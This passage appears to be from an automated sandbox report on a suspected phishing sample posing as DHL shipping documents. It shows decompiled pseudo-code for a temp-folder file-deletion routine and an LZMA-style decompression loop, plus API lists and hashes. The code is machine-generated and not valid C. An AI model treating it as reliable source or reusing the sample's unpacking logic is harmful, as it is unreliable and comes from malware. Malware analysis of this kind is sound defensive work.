                        				__eflags =  *_t8;
                        				if( *_t8 == 0) {
                        					L5:
                        					E00406668(0x425750, _t68);
                        					__eflags = _a4;
                        					if(_a4 == 0) {
                        						E00405F83(_t68);
                        					} else {
                        						lstrcatW(0x425750, L"\\*.*");
                        					}
                        					__eflags =  *_t68;
                        					if( *_t68 != 0) {
                        						L10:
                        						lstrcatW(_t68, 0x40a014);
                        						L11:
                        						_t66 =  &(_t68[lstrlenW(_t68)]);
                        						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
                        						_t70 = _t38;
                        						__eflags = _t70 - 0xffffffff;
                        						if(_t70 == 0xffffffff) {
                        							L26:
                        							__eflags = _a4;
                        							if(_a4 != 0) {
                        								_t30 = _t66 - 2;
                        								 *_t30 =  *(_t66 - 2) & 0x00000000;
                        								__eflags =  *_t30;
                        							}
                        							goto L28;
                        						} else {
                        							goto L12;
                        						}
                        						do {
                        							L12:
                        							__eflags = _v604.cFileName - 0x2e;
                        							if(_v604.cFileName != 0x2e) {
                        								L16:
                        								E00406668(_t66,  &(_v604.cFileName));
                        								__eflags = _v604.dwFileAttributes & 0x00000010;
                        								if(__eflags == 0) {
                        									_t52 = E00405D2C(__eflags, _t68, _v8);
                        									__eflags = _t52;
                        									if(_t52 != 0) {
                        										E004056CA(0xfffffff2, _t68);
                        									} else {
                        										__eflags = _v8 - _t52;
                        										if(_v8 == _t52) {
                        											 *0x42a2e8 =  *0x42a2e8 + 1;
                        										} else {
                        											E004056CA(0xfffffff1, _t68);
                        											E00406428(_t67, _t68, 0);
                        										}
                        									}
                        								} else {
                        									__eflags = (_a8 & 0x00000003) - 3;
                        									if(__eflags == 0) {
                        										E00405D74(__eflags, _t68, _a8);
                        									}
                        								}
                        								goto L24;
                        							}
                        							__eflags = _v558;
                        							if(_v558 == 0) {
                        								goto L24;
                        							}
                        							__eflags = _v558 - 0x2e;
                        							if(_v558 != 0x2e) {
                        								goto L16;
                        							}
                        							__eflags = _v556;
                        							if(_v556 == 0) {
                        								goto L24;
                        							}
                        							goto L16;
                        							L24:
                        							_t55 = FindNextFileW(_t70,  &_v604); // executed
                        							__eflags = _t55;
                        						} while (_t55 != 0);
                        						_t38 = FindClose(_t70); // executed
                        						goto L26;
                        					}
                        					__eflags =  *0x425750 - 0x5c;
                        					if( *0x425750 != 0x5c) {
                        						goto L11;
                        					}
                        					goto L10;
                        				} else {
                        					__eflags = _t38;
                        					if(_t38 == 0) {
                        						L28:
                        						__eflags = _a4;
                        						if(_a4 == 0) {
                        							L36:
                        							return _t38;
                        						}
                        						__eflags = _v12;
                        						if(_v12 != 0) {
                        							_t38 = E0040699E(_t68);
                        							__eflags = _t38;
                        							if(_t38 == 0) {
                        								goto L36;
                        							}
                        							E00405F37(_t68);
                        							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                        							__eflags = _t38;
                        							if(_t38 != 0) {
                        								return E004056CA(0xffffffe5, _t68);
                        							}
                        							__eflags = _v8;
                        							if(_v8 == 0) {
                        								goto L30;
                        							}
                        							E004056CA(0xfffffff1, _t68);
                        							return E00406428(_t67, _t68, 0);
                        						}
                        						L30:
                        						 *0x42a2e8 =  *0x42a2e8 + 1;
                        						return _t38;
                        					}
                        					__eflags = _t65 & 0x00000002;
                        					if((_t65 & 0x00000002) == 0) {
                        						goto L28;
                        					}
                        					goto L5;
                        				}
                        			}

                        APIs
                        • DeleteFileW.KERNELBASE(?,?,74D0FAA0,74D0F560,00000000), ref: 00405D9D
                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl9995.tmp\*.*,\*.*), ref: 00405DE5
                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                        • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsl9995.tmp\*.*,?,?,74D0FAA0,74D0F560,00000000), ref: 00405E0E
                        • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsl9995.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsl9995.tmp\*.*,?,?,74D0FAA0,74D0F560,00000000), ref: 00405E1E
                        • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                        • FindClose.KERNELBASE(00000000), ref: 00405ECD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                        • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsl9995.tmp\*.*$\*.*
                        • API String ID: 2035342205-3378084780
                        • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                        • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                        • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                        • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 98%
                        			E00406D5F() {
                        				unsigned short _t531;
                        				signed int _t532;
                        				void _t533;
                        				void* _t534;
                        				signed int _t535;
                        				signed int _t565;
                        				signed int _t568;
                        				signed int _t590;
                        				signed int* _t607;
                        				void* _t614;
                        
                        				L0:
                        				while(1) {
                        					L0:
                        					if( *(_t614 - 0x40) != 0) {
                        						 *(_t614 - 0x34) = 1;
                        						 *(_t614 - 0x84) = 7;
                        						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                        						L132:
                        						 *(_t614 - 0x54) = _t607;
                        						L133:
                        						_t531 =  *_t607;
                        						_t590 = _t531 & 0x0000ffff;
                        						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                        						if( *(_t614 - 0xc) >= _t565) {
                        							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                        							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                        							 *(_t614 - 0x40) = 1;
                        							_t532 = _t531 - (_t531 >> 5);
                        							 *_t607 = _t532;
                        						} else {
                        							 *(_t614 - 0x10) = _t565;
                        							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                        							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                        						}
                        						if( *(_t614 - 0x10) >= 0x1000000) {
                        							L139:
                        							_t533 =  *(_t614 - 0x84);
                        							L140:
                        							 *(_t614 - 0x88) = _t533;
                        							goto L1;
                        						} else {
                        							L137:
                        							if( *(_t614 - 0x6c) == 0) {
                        								 *(_t614 - 0x88) = 5;
                        								goto L170;
                        							}
                        							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                        							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                        							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                        							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                        							goto L139;
                        						}
                        					} else {
                        						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                        						__esi =  *(__ebp - 0x60);
                        						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                        						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                        						__ecx =  *(__ebp - 0x3c);
                        						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                        						__ecx =  *(__ebp - 4);
                        						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                        						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                        						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                        						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                        						if( *(__ebp - 0x38) >= 4) {
                        							if( *(__ebp - 0x38) >= 0xa) {
                        								_t97 = __ebp - 0x38;
                        								 *_t97 =  *(__ebp - 0x38) - 6;
                        							} else {
                        								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                        							}
                        						} else {
                        							 *(__ebp - 0x38) = 0;
                        						}
                        						if( *(__ebp - 0x34) == __edx) {
                        							__ebx = 0;
                        							__ebx = 1;
                        							L60:
                        							__eax =  *(__ebp - 0x58);
                        							__edx = __ebx + __ebx;
                        							__ecx =  *(__ebp - 0x10);
                        							__esi = __edx + __eax;
                        							__ecx =  *(__ebp - 0x10) >> 0xb;
                        							__ax =  *__esi;
                        							 *(__ebp - 0x54) = __esi;
                        							__edi = __ax & 0x0000ffff;
                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        							if( *(__ebp - 0xc) >= __ecx) {
                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        								__cx = __ax;
                        								_t216 = __edx + 1; // 0x1
                        								__ebx = _t216;
                        								__cx = __ax >> 5;
                        								 *__esi = __ax;
                        							} else {
                        								 *(__ebp - 0x10) = __ecx;
                        								0x800 = 0x800 - __edi;
                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        								__ebx = __ebx + __ebx;
                        								 *__esi = __cx;
                        							}
                        							 *(__ebp - 0x44) = __ebx;
                        							if( *(__ebp - 0x10) >= 0x1000000) {
                        								L59:
                        								if(__ebx >= 0x100) {
                        									goto L54;
                        								}
                        								goto L60;
                        							} else {
                        								L57:
                        								if( *(__ebp - 0x6c) == 0) {
                        									 *(__ebp - 0x88) = 0xf;
                        									goto L170;
                        								}
                        								__ecx =  *(__ebp - 0x70);
                        								__eax =  *(__ebp - 0xc);
                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        								_t202 = __ebp - 0x70;
                        								 *_t202 =  *(__ebp - 0x70) + 1;
                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        								goto L59;
                        							}
                        						} else {
                        							__eax =  *(__ebp - 0x14);
                        							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                        							if(__eax >=  *(__ebp - 0x74)) {
                        								__eax = __eax +  *(__ebp - 0x74);
                        							}
                        							__ecx =  *(__ebp - 8);
                        							__ebx = 0;
                        							__ebx = 1;
                        							__al =  *((intOrPtr*)(__eax + __ecx));
                        							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                        							L40:
                        							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                        							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                        							__ecx =  *(__ebp - 0x58);
                        							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                        							 *(__ebp - 0x48) = __eax;
                        							__eax = __eax + 1;
                        							__eax = __eax << 8;
                        							__eax = __eax + __ebx;
                        							__esi =  *(__ebp - 0x58) + __eax * 2;
                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                        							__ax =  *__esi;
                        							 *(__ebp - 0x54) = __esi;
                        							__edx = __ax & 0x0000ffff;
                        							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                        							if( *(__ebp - 0xc) >= __ecx) {
                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        								__cx = __ax;
                        								 *(__ebp - 0x40) = 1;
                        								__cx = __ax >> 5;
                        								__ebx = __ebx + __ebx + 1;
                        								 *__esi = __ax;
                        							} else {
                        								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                        								 *(__ebp - 0x10) = __ecx;
                        								0x800 = 0x800 - __edx;
                        								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                        								__ebx = __ebx + __ebx;
                        								 *__esi = __cx;
                        							}
                        							 *(__ebp - 0x44) = __ebx;
                        							if( *(__ebp - 0x10) >= 0x1000000) {
                        								L38:
                        								__eax =  *(__ebp - 0x40);
                        								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                        									while(1) {
                        										if(__ebx >= 0x100) {
                        											break;
                        										}
                        										__eax =  *(__ebp - 0x58);
                        										__edx = __ebx + __ebx;
                        										__ecx =  *(__ebp - 0x10);
                        										__esi = __edx + __eax;
                        										__ecx =  *(__ebp - 0x10) >> 0xb;
                        										__ax =  *__esi;
                        										 *(__ebp - 0x54) = __esi;
                        										__edi = __ax & 0x0000ffff;
                        										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                        										if( *(__ebp - 0xc) >= __ecx) {
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                        											__cx = __ax;
                        											_t169 = __edx + 1; // 0x1
                        											__ebx = _t169;
                        											__cx = __ax >> 5;
                        											 *__esi = __ax;
                        										} else {
                        											 *(__ebp - 0x10) = __ecx;
                        											0x800 = 0x800 - __edi;
                        											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                        											__ebx = __ebx + __ebx;
                        											 *__esi = __cx;
                        										}
                        										 *(__ebp - 0x44) = __ebx;
                        										if( *(__ebp - 0x10) < 0x1000000) {
                        											L45:
                        											if( *(__ebp - 0x6c) == 0) {
                        												 *(__ebp - 0x88) = 0xe;
                        												goto L170;
                        											}
                        											__ecx =  *(__ebp - 0x70);
                        											__eax =  *(__ebp - 0xc);
                        											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        											_t155 = __ebp - 0x70;
                        											 *_t155 =  *(__ebp - 0x70) + 1;
                        											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        										}
                        									}
                        									L53:
                        									_t172 = __ebp - 0x34;
                        									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                        									L54:
                        									__al =  *(__ebp - 0x44);
                        									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                        									L55:
                        									if( *(__ebp - 0x64) == 0) {
                        										 *(__ebp - 0x88) = 0x1a;
                        										goto L170;
                        									}
                        									__ecx =  *(__ebp - 0x68);
                        									__al =  *(__ebp - 0x5c);
                        									__edx =  *(__ebp - 8);
                        									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                        									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                        									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                        									 *( *(__ebp - 0x68)) = __al;
                        									__ecx =  *(__ebp - 0x14);
                        									 *(__ecx +  *(__ebp - 8)) = __al;
                        									__eax = __ecx + 1;
                        									__edx = 0;
                        									_t191 = __eax %  *(__ebp - 0x74);
                        									__eax = __eax /  *(__ebp - 0x74);
                        									__edx = _t191;
                        									L79:
                        									 *(__ebp - 0x14) = __edx;
                        									L80:
                        									 *(__ebp - 0x88) = 2;
                        									goto L1;
                        								}
                        								if(__ebx >= 0x100) {
                        									goto L53;
                        								}
                        								goto L40;
                        							} else {
                        								L36:
                        								if( *(__ebp - 0x6c) == 0) {
                        									 *(__ebp - 0x88) = 0xd;
                        									L170:
                        									_t568 = 0x22;
                        									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                        									_t535 = 0;
                        									L172:
                        									return _t535;
                        								}
                        								__ecx =  *(__ebp - 0x70);
                        								__eax =  *(__ebp - 0xc);
                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        								_t121 = __ebp - 0x70;
                        								 *_t121 =  *(__ebp - 0x70) + 1;
                        								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        								goto L38;
                        							}
                        						}
                        					}
                        					L1:
                        					_t534 =  *(_t614 - 0x88);
                        					if(_t534 > 0x1c) {
                        						L171:
                        						_t535 = _t534 | 0xffffffff;
                        						goto L172;
                        					}
                        					switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                        						case 0:
                        							if( *(_t614 - 0x6c) == 0) {
                        								goto L170;
                        							}
                        							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                        							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                        							_t534 =  *( *(_t614 - 0x70));
                        							if(_t534 > 0xe1) {
                        								goto L171;
                        							}
                        							_t538 = _t534 & 0x000000ff;
                        							_push(0x2d);
                        							asm("cdq");
                        							_pop(_t570);
                        							_push(9);
                        							_pop(_t571);
                        							_t610 = _t538 / _t570;
                        							_t540 = _t538 % _t570 & 0x000000ff;
                        							asm("cdq");
                        							_t605 = _t540 % _t571 & 0x000000ff;
                        							 *(_t614 - 0x3c) = _t605;
                        							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                        							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                        							_t613 = (0x300 << _t605 + _t610) + 0x736;
                        							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                        								L10:
                        								if(_t613 == 0) {
                        									L12:
                        									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                        									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                        									goto L15;
                        								} else {
                        									goto L11;
                        								}
                        								do {
                        									L11:
                        									_t613 = _t613 - 1;
                        									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                        								} while (_t613 != 0);
                        								goto L12;
                        							}
                        							if( *(_t614 - 4) != 0) {
                        								GlobalFree( *(_t614 - 4));
                        							}
                        							_t534 = GlobalAlloc(0x40, 0x600); // executed
                        							 *(_t614 - 4) = _t534;
                        							if(_t534 == 0) {
                        								goto L171;
                        							} else {
                        								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                        								goto L10;
                        							}
                        						case 1:
                        							L13:
                        							__eflags =  *(_t614 - 0x6c);
                        							if( *(_t614 - 0x6c) == 0) {
                        								 *(_t614 - 0x88) = 1;
                        								goto L170;
                        							}
                        							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                        							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                        							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                        							_t45 = _t614 - 0x48;
                        							 *_t45 =  *(_t614 - 0x48) + 1;
                        							__eflags =  *_t45;
                        							L15:
                        							if( *(_t614 - 0x48) < 4) {
                        								goto L13;
                        							}
                        							_t546 =  *(_t614 - 0x40);
                        							if(_t546 ==  *(_t614 - 0x74)) {
                        								L20:
                        								 *(_t614 - 0x48) = 5;
                        								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                        								goto L23;
                        							}
                        							 *(_t614 - 0x74) = _t546;
                        							if( *(_t614 - 8) != 0) {
                        								GlobalFree( *(_t614 - 8));
                        							}
                        							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                        							 *(_t614 - 8) = _t534;
                        							if(_t534 == 0) {
                        								goto L171;
                        							} else {
                        								goto L20;
                        							}
                        						case 2:
                        							L24:
                        							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                        							 *(_t614 - 0x84) = 6;
                        							 *(_t614 - 0x4c) = _t553;
                        							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                        							goto L132;
                        						case 3:
                        							L21:
                        							__eflags =  *(_t614 - 0x6c);
                        							if( *(_t614 - 0x6c) == 0) {
                        								 *(_t614 - 0x88) = 3;
                        								goto L170;
                        							}
                        							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                        							_t67 = _t614 - 0x70;
                        							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                        							__eflags =  *_t67;
                        							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                        							L23:
                        							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                        							if( *(_t614 - 0x48) != 0) {
                        								goto L21;
                        							}
                        							goto L24;
                        						case 4:
                        							goto L133;
                        						case 5:
                        							goto L137;
                        						case 6:
                        							goto L0;
                        						case 7:
                        							__eflags =  *(__ebp - 0x40) - 1;
                        							if( *(__ebp - 0x40) != 1) {
                        								__eax =  *(__ebp - 0x24);
                        								 *(__ebp - 0x80) = 0x16;
                        								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                        								__eax =  *(__ebp - 0x28);
                        								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                        								__eax =  *(__ebp - 0x2c);
                        								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                        								__eax = 0;
                        								__eflags =  *(__ebp - 0x38) - 7;
                        								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                        								__al = __al & 0x000000fd;
                        								__eax = (__eflags >= 0) - 1 + 0xa;
                        								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                        								__eax =  *(__ebp - 4);
                        								__eax =  *(__ebp - 4) + 0x664;
                        								__eflags = __eax;
                        								 *(__ebp - 0x58) = __eax;
                        								goto L68;
                        							}
                        							__eax =  *(__ebp - 4);
                        							__ecx =  *(__ebp - 0x38);
                        							 *(__ebp - 0x84) = 8;
                        							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                        							goto L132;
                        						case 8:
                        							__eflags =  *(__ebp - 0x40);
                        							if( *(__ebp - 0x40) != 0) {
                        								__eax =  *(__ebp - 4);
                        								__ecx =  *(__ebp - 0x38);
                        								 *(__ebp - 0x84) = 0xa;
                        								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                        							} else {
                        								__eax =  *(__ebp - 0x38);
                        								__ecx =  *(__ebp - 4);
                        								__eax =  *(__ebp - 0x38) + 0xf;
                        								 *(__ebp - 0x84) = 9;
                        								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                        								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                        							}
                        							goto L132;
                        						case 9:
                        							__eflags =  *(__ebp - 0x40);
                        							if( *(__ebp - 0x40) != 0) {
                        								goto L89;
                        							}
                        							__eflags =  *(__ebp - 0x60);
                        							if( *(__ebp - 0x60) == 0) {
                        								goto L171;
                        							}
                        							__eax = 0;
                        							__eflags =  *(__ebp - 0x38) - 7;
                        							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                        							__eflags = _t258;
                        							0 | _t258 = _t258 + _t258 + 9;
                        							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                        							goto L75;
                        						case 0xa:
                        							__eflags =  *(__ebp - 0x40);
                        							if( *(__ebp - 0x40) != 0) {
                        								__eax =  *(__ebp - 4);
                        								__ecx =  *(__ebp - 0x38);
                        								 *(__ebp - 0x84) = 0xb;
                        								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                        								goto L132;
                        							}
                        							__eax =  *(__ebp - 0x28);
                        							goto L88;
                        						case 0xb:
                        							__eflags =  *(__ebp - 0x40);
                        							if( *(__ebp - 0x40) != 0) {
                        								__ecx =  *(__ebp - 0x24);
                        								__eax =  *(__ebp - 0x20);
                        								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                        							} else {
                        								__eax =  *(__ebp - 0x24);
                        							}
                        							__ecx =  *(__ebp - 0x28);
                        							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                        							L88:
                        							__ecx =  *(__ebp - 0x2c);
                        							 *(__ebp - 0x2c) = __eax;
                        							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                        							L89:
                        							__eax =  *(__ebp - 4);
                        							 *(__ebp - 0x80) = 0x15;
                        							__eax =  *(__ebp - 4) + 0xa68;
                        							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                        							goto L68;
                        						case 0xc:
                        							L99:
                        							__eflags =  *(__ebp - 0x6c);
                        							if( *(__ebp - 0x6c) == 0) {
                        								 *(__ebp - 0x88) = 0xc;
                        								goto L170;
                        							}
                        							__ecx =  *(__ebp - 0x70);
                        							__eax =  *(__ebp - 0xc);
                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							_t334 = __ebp - 0x70;
                        							 *_t334 =  *(__ebp - 0x70) + 1;
                        							__eflags =  *_t334;
                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							__eax =  *(__ebp - 0x2c);
                        							goto L101;
                        						case 0xd:
                        							goto L36;
                        						case 0xe:
                        							goto L45;
                        						case 0xf:
                        							goto L57;
                        						case 0x10:
                        							L109:
                        							__eflags =  *(__ebp - 0x6c);
                        							if( *(__ebp - 0x6c) == 0) {
                        								 *(__ebp - 0x88) = 0x10;
                        								goto L170;
                        							}
                        							__ecx =  *(__ebp - 0x70);
                        							__eax =  *(__ebp - 0xc);
                        							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                        							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                        							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                        							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							_t365 = __ebp - 0x70;
                        							 *_t365 =  *(__ebp - 0x70) + 1;
                        							__eflags =  *_t365;
                        							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                        							goto L111;
                        						case 0x11:
                        							L68:
                        							__esi =  *(__ebp - 0x58);
                        							 *(__ebp - 0x84) = 0x12;
                        							goto L132;
                        						case 0x12:
                        							__eflags =  *(__ebp - 0x40);
                        							if( *(__ebp - 0x40) != 0) {
                        								__eax =  *(__ebp - 0x58);
                        								 *(__ebp - 0x84) = 0x13;
                        								__esi =  *(__ebp - 0x58) + 2;
                        								goto L132;
                        							}
                        							__eax =  *(__ebp - 0x4c);
                        							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                        							__ecx =  *(__ebp - 0x58);
                        							__eax =  *(__ebp - 0x4c) << 4;
                        							__eflags = __eax;
                        							__eax =  *(__ebp - 0x58) + __eax + 4;
                        							goto L130;
                        						case 0x13:
                        							__eflags =  *(__ebp - 0x40);
